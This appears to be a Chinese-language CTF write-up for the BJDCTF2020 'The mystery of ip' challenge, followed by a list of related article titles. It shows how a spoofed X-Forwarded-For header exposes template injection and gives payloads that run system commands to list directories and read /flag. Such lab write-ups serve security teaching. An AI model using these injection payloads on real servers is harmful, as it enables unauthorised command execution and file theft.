[BJDCTF2020]The mystery of ip 1

TazmiDev發表於2024-11-24

[BJDCTF2020]The mystery of ip 1

開啟例項，發現flag.php路徑，訪問顯示自己當前的內網ip

hackerbar新增xff請求頭，嘗試ip偽造，成功回顯

判斷可能為xff注入，嘗試sql的部分注入語句均無效，放棄sql注入，嘗試SSTI模板注入

X-Forwarded-For: {1+1}

成功回顯，存在XFF-SSTI模板注入漏洞

嘗試構造payload

X-Forwarded-For: {system("ls")}

成功遍歷目錄

檢視flag.php，未發現flag

檢視根目錄

X-Forwarded-For: {system("ls / -a")}

發現flag，最終payload為:

X-Forwarded-For: {system("cat /flag")}

flag{b0a840de-eeaf-4ed1-80c1-bb12ff2bcb10}

[BJDCTF2020]The mystery of ip
2024-11-13
TF2
[BJDCTF2020]EzPHP 1
2024-07-13
TF2PHP
[BJDCTF2020]Easy MD5 1
2024-03-13
TF2
Linux Load Average: Solving the Mystery
2022-04-29
Linux
[BJDCTF2020]Easy MD5
2024-11-20
TF2
《TCP/IP詳解卷1：協議》第3章 IP：網際協議（1）-讀書筆記
2015-04-16
TCP協議筆記
tcp/ip協議(1)三握四揮
2020-12-01
TCP協議
IP組播基礎及工作原理——1
2017-12-25
IP欺騙技術介紹(1) (轉)
2007-08-12
《TCP/IP詳解卷1：協議》第3章 IP:網際協議
2018-11-14
TCP協議
《TCP/IP詳解卷1：協議》第1章概述-讀書筆記
2015-04-14
TCP協議筆記
hacmp boot ip\svc ip \standby ip\ rac ip
2014-12-23
ACMboot
10億買1元賣，只因一個《傳奇》IP
2020-09-17
《從0到1》：解密一個IP的非凡運營
2015-08-12
解密
1（5）led燈閃爍、常見ip核介紹
2024-11-21
《TCP/IP詳解卷1：協議》第3章 IP：網際協議（2）-讀書筆記
2015-04-17
TCP協議筆記
《TCP/IP詳解1》筆記（第2章鏈路層）
2012-06-27
TCP筆記
IP協議&&IP首部
2018-11-11
協議
【TCP/IP】IP地址分類和特殊IP地址
2018-07-12
TCP
阿里雲1核1G記憶體1M寬頻支援多少IP訪問量夠用嗎？
2019-02-28
阿里記憶體
IP in IP tunneling
2014-11-04
IP別名\替換IP
2011-04-27
TCP/IP、UDP/IP協議
2024-08-29
TCPUDP協議
Centos 7 檢視本機IP 編輯IP 修改ip
2021-05-17
CentOS
[BJDCTF2020]ZJCTF，不過如此(php偽協議,data偽協議,preg_replace /e漏洞)
2020-10-04
TF2PHP協議
阿里雲1核2G記憶體1M寬頻線上多少IP夠用嗎？
2019-02-28
阿里記憶體
解析原生IP和廣播IP
2022-07-14
IP基礎--7.IP封包
2007-08-25
蘋果IP：如何換IP？換IP最簡單的方法分享
2020-04-22
蘋果
《TCP/IP詳解卷1：協議》第17、18章 TCP：傳輸控制協議（1）-讀書筆記
2015-04-22
TCP協議筆記
彈性公網IP（Elastic IP，EIP）
2019-06-19
AST
什麼是IP地址、IP協議？
2019-06-20
協議
4. 自動封IP和解IP
2019-01-12
linux修改IP為靜態IP
2016-05-30
Linux
IP基礎--7.IP封包(轉)
2007-08-09
IP地址
2018-05-28
CS:IP
2017-03-03
遮蔽ip
2017-12-08

[BJDCTF2020]The mystery of ip 1

[BJDCTF2020]The mystery of ip 1

相關文章